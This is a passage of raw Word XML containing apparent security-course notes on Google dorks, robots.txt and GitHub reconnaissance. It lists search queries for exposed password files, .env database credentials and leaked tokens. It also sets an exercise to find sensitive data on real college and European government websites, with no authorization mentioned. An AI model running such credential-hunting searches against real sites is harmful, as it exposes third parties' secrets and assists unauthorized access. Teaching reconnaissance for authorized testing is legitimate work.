        <w:t>Google Dorks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000087" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a set of keywords with which you can access google to get exact results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000088" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000089" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>filetype:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000008A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000008B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>intext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000008C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>intitle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000008D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>site:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000008E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allinurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000008F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allintext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000090" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000091" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>How a web server works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000092" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000093" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Type of Bug using google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000094" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Server misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000095" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Sensitive information disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000096" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Directory traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000097" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000098" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Insecure storage of credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000099" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000009A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000009B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Google Dorks usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000009C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000009D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>index of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000009E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>index of backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000009F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>index of trash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>index of password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">index of password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>site:edu.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000000A2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">index of password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>site:gov.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000000A3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000A4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>File extensions - .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>conf .env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000000A5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000A6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filetype:log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:"password.log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000A8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db_username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>filetype:env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000000A9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000AA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000000AB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000AC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000AD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000AE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. Use google dorks to find 2 sensitive information of any college website in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tamilnadu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000000AF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">2. Use google dorks to find 2 sensitive information of any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>european</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> government website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000B0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000B1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000B2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000B3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000B4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000B5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000B6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000B7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000B8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000B9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000BA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000BB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>15-09-2021, WEDNESDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000BC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000BD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- countermeasures of google dorks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000BE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ROBOTS.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000BF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a simple configuration file written in notepad which allows google and other search engines of what to access and what not to access from your website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000C0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000C1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Allow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000C2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Disallow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000C3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000C4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Disadvantage of robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000C5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Robots.txt can intercept and block request which is raised from a search engine (google, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>....) but not manual request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000C6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Robots.txt can reveal the directory structure of websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000C7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000C8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Google and other products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000C9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-&gt; google dot vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000CA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000CB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>email 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000CC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sankarraj@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000CD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000CE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>email 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000CF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sankar.raj@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000D0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000D1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>s.a.n.k.a.r.r.a.j@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000D2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000D3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>s.ankarraj@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000D4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sa.nkarraj@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000D5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>san.karraj@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000D6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000D7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sankar_raj@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000D8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000D9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-&gt; log files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000DA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000DB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-&gt; My activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000DC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000DD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Survillence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Capitalism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000DE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>When any product is offered free of cost to the customer, then the customer becomes the product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000DF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000E0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>B. OTHER SEARCH ENGINE BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000E1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>GITHUB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000E2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Git is an open-source version control system that was started by Linus Torvalds (Creator of Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000E3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000E4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1.What is Version Control System?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000E5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">2.Components of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000000E6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3.Github for Bug Bounty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000E7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Searching Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000E8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5.Automated Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000E9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000EA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000EB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000EC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>What is Version Control System?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000ED" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Developer creates an app ABC and they release newer versions of these app now and then (ABC v1.0, ABC v1.1 etc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000EE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000EF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Now version control system stores all these revised versions of codes in a central repository, so that developers find it easy to modify the code and update it with the newest version of the software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000F0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000F1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Every developer can see the project, look at the changes, download and contribute to the project and also a normal user can download and use the software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000F2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000F3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Components of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000000F4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Repository - Usually called as REPO. Is a location where all files of a particular project or software are stored and it has </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> unique </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with which others can access it. a repository is essentially a project’s folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000F5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000F6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Commit - is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> change that you make to the code, file or set of files. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Everytime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> u change something, it gets saved with a unique id, so other developers will be aware that who made the changes and when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000F7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000F8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Issues - are suggestions, improvements or errors related to that repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000F9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000FA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for Bug Bounty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000FB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000FC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We can use GitHub to know more about the target, internal details, products and their infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000FD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000000FE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We can look for services like SSH, SFTP, FTP, PROXY, VPN, VSPHERE, SIEM, FIREWALL etc, then narrow down the search and check the code committed to that which might have valuable information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000FF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000100" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We can look for keywords like the below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000101" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000102" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“company” password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000103" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“company” secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000104" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“company” credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000105" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“company” token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000106" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000107" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Other common keywords which you can include after company are key, pass, login, ftp, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000108" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000109" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Few keywords and corresponding results which we might get.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000010A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000010B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">“company” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>security_credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LDAP (Active directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000010C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">“company” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionstring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Database Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000010D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“company” JDBC</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Database Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000010E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“company” ssh2_auth_password</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Unauthorized access to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000010F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">“company” </w:t>
      </w:r>
